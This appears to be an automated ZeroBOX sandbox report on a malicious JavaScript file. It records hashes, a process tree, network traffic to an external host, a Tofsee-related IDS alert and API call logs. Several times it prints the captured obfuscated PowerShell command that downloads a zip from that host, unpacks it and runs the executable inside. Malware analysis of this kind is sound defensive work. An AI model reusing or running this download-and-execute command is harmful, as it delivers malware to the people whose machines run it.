Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 9, 2023, 9 a.m.	June 9, 2023, 9:02 a.m.

Size	4.9KB
Type	ASCII text, with very long lines, with CRLF, LF line terminators
MD5	`76f6a06e23970b7eb45cabba0418a5d2`
SHA256	`7ea08c1bfd78c89d38cf2ef50da2146622727072d956a379ae68a8fec3fa7fc3`
CRC32	`49111C10`
ssdeep	`96:5sBeprD12YkUUGsgZislNRGBhWp5quaajeQF+fjsfK0kS6RdX+lnF:SBOD1mUUGsBslTGBhU5q3aCQFGsfK0ki`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\5943.js
3048
- cmd.exe "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
  1784
  - powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Users\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive -Path C:\Users\test22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Local\Temp;
    2344

Name	Response	Post-Analysis Lookup
fuelrescue.ie	A 185.2.67.20	185.2.67.20

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.2.67.20	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49165 -> 185.2.67.20:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49165 185.2.67.20:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=fuelrescue.ie	cc:86:2c:37:8c:85:c8:4d:41:b1:25:af:05:8b:ef:88:db:fd:95:72

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2023, 9 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 9, 2023, 9 a.m.			0	0

Command line console output was observed (14 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 9, 2023, 9 a.m.	buffer: 'C:\Users\test22\AppData\Local\Temp/1.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: 'XPZiglnScTRWqeE' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: The term 'Expand-Archive' is not recognized as the name of a cmdlet, function, console_handle: 0x00000023	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x0000002f	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: At line:1 char:213 console_handle: 0x00000047	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: + $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-A console_handle: 0x00000053	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: gent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Use console_handle: 0x0000005f	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: rs\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive <<<< -Path C:\Users\t console_handle: 0x0000006b	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: est22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Loc console_handle: 0x00000077	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: al\Temp; console_handle: 0x00000083	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Expand-Archive:String) [], Comm console_handle: 0x0000008f	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: andNotFoundException console_handle: 0x0000009b	1	1
WriteConsoleW June 9, 2023, 9 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000a7	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aae00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aae00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aae00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aad00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aad00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aad00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aad00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aad00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aad00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aa980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aaa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005aaa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2023, 9 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 9, 2023, 9 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET https://fuelrescue.ie/wp/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 149 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73951000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73952000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02232000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02242000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02243000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02244000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02262000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02245000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02246000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02263000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02264000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02265000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02266000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02267000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02268000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02269000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2023, 9 a.m.	process_identifier: 2344 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
